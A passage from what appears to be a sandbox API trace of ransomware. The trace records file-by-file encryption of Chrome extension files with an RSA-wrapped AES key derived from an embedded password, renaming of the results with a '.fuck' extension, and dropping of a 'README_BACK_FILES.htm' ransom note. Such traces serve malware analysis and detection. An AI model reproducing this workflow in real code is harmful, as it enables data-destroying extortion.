lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.588] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.588] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.588] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.588] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.588] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.589] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.589] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.589] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.589] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.589] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.589] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.589] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.589] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.589] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.589] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.589] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.589] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.589] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.589] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.589] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.589] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.590] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.590] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.590] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.590] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.590] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.590] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.590] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.590] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.590] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.590] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.590] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.591] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x15d, lpOverlapped=0x0) returned 1 [0262.591] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x15d, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x160) returned 1 [0262.591] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x160, lpOverlapped=0x0) returned 1 [0262.591] CloseHandle (hObject=0x5d60) returned 1 [0262.591] CloseHandle (hObject=0x5d5c) returned 1 [0262.591] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), bFailIfExists=0) returned 1 [0262.594] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json", dwFileAttributes=0x0) returned 1 [0262.595] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.gsg")) returned 1 [0262.596] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.fuck")) returned 1 [0262.597] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.597] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0262.597] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.597] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.597] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.597] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\readme_back_files.htm")) returned 0xffffffff [0262.597] AreFileApisANSI () returned 1 [0262.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.597] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.598] GetFileType (hFile=0x5d64) returned 0x1 [0262.598] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.599] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.599] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.599] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.599] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.600] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.600] GetLastError () returned 0x0 [0262.600] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json")) returned 0x20 [0262.600] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json", dwFileAttributes=0x80) returned 1 [0262.601] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.601] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.603] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.603] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.605] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.605] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.605] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.605] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7dac0) returned 1 [0262.605] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.605] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.605] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e72a48) returned 1 [0262.605] CryptImportPublicKeyInfo (in: hCryptProv=0x2e72a48, dwCertEncodingType=0x1, pInfo=0x2eacb30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eacb60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eacb68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7dd40) returned 1 [0262.605] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.605] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e72e00*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e72e00*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.606] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e72e00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e72e00*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.607] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.616] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.616] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.619] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.619] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.619] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.620] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.620] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.620] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.620] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.620] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.620] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.620] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.620] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.620] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.620] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.620] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.620] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.620] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.620] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.620] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.620] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.620] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.621] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 